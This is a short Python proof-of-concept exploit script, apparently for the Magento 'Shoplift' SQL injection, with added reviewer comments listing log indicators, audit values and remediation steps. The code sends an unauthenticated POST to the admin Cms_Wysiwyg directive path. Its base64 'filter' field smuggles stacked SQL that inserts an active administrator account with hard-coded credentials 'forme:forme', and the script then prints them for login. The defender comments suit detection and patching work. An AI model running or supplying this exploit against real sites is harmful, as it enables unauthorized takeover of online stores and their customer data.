  1. #Thanks to
  2. # Zero cool, code breaker ICA, Team indishell, my father , rr mam, jagriti and DON
  3. import requests
  4. import base64
  5. import sys
  6.  
  # NOTE(review): flat proof-of-concept script. As written it sends a single POST,
  # with no cookies or credentials set on the request, to an admin-area controller
  # path and carries stacked SQL statements in the `filter` form field. The pattern
  # appears to match the publicly documented Magento admin-creation SQL injection
  # (often called "Shoplift") -- confirm against the vendor advisory before relying
  # on that attribution.
  # Defender view: the indicators on this page are the request path, the
  # `___directive` / `filter` / `forwarded` form fields, and the constant account
  # values in the SQL template. Remediation is the vendor's security patch for this
  # issue, restricting who can reach the admin path, removing any unexpected rows
  # from admin_user / admin_role, and rotating admin credentials.
  7. target = "http://www.###.com/"
  8.  
  # Normalise the base URL: prepend a scheme when none is present ...
  9. if not target.startswith("http"):
  10. target = "http://" + target
  11.  
  # ... and drop one trailing slash so the path below joins cleanly.
  12. if target.endswith("/"):
  13. target = target[:-1]
  14.  
  # Request path to look for in web-server access logs. POST bodies are usually not
  # logged, so method + path is often the only trace of this request.
  15. target_url = target + "/admin/Cms_Wysiwyg/directive/index/"
  16.  
  # SQL template (a runtime string, left untouched). It builds a password value as
  # MD5('rp' + password) followed by ':' and the salt 'rp', reads MAX(extra) from
  # existing admin_user rows, inserts an active (is_active = 1) row into admin_user,
  # then inserts an admin_role row of role_type 'U' with parent_id 1 for that user.
  # Audit both tables for the constants used here: firstname/role_name 'Eerstenaam',
  # lastname 'Laatstenaam', email 'geen@idee.nl'.
  # NOTE(review): parent_id 1 is presumably the built-in administrators role --
  # verify on the affected install.
  17. q="""
  18. SET @SALT = 'rp';
  19. SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
  20. SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
  21. INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Eerstenaam','Laatstenaam','geen@idee.nl','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
  22. INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Eerstenaam');
  23. """
  24.  
  25.  
  # Newlines are stripped so the statements form one line; username and password are
  # both hard-coded to "forme", which is a further value to search admin_user for.
  26. query = q.replace("\n", "").format(username="forme", password="forme")
  # The statements are appended after `popularity[field_expr]=0);`. That only has an
  # effect if the server places field_expr into a SQL expression unescaped; this is
  # inferred from the payload shape and is not shown in this file.
  27. pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
  28.  
  29. # e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decodes to {{block type=Adminhtml/report_search_grid output=getCsvFile}}
  # Form fields sent: the base64 directive above, `filter` as the base64 of pfilter,
  # and `forwarded` set to 1.
  30. r = requests.post(target_url,
  31. data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
  32. "filter": base64.b64encode(pfilter),
  33. "forwarded": 1})
  # r.ok only reports that the HTTP status was below 400. It does not show that any
  # row was inserted, so a "WORKED" line is not evidence of compromise on its own;
  # confirm by inspecting admin_user and admin_role directly.
  34. if r.ok:
  35. print ("WORKED")
  36. print ("Check {0}/admin with creds forme:forme".format(target))
  37. else:
  38. print ("DID NOT WORK")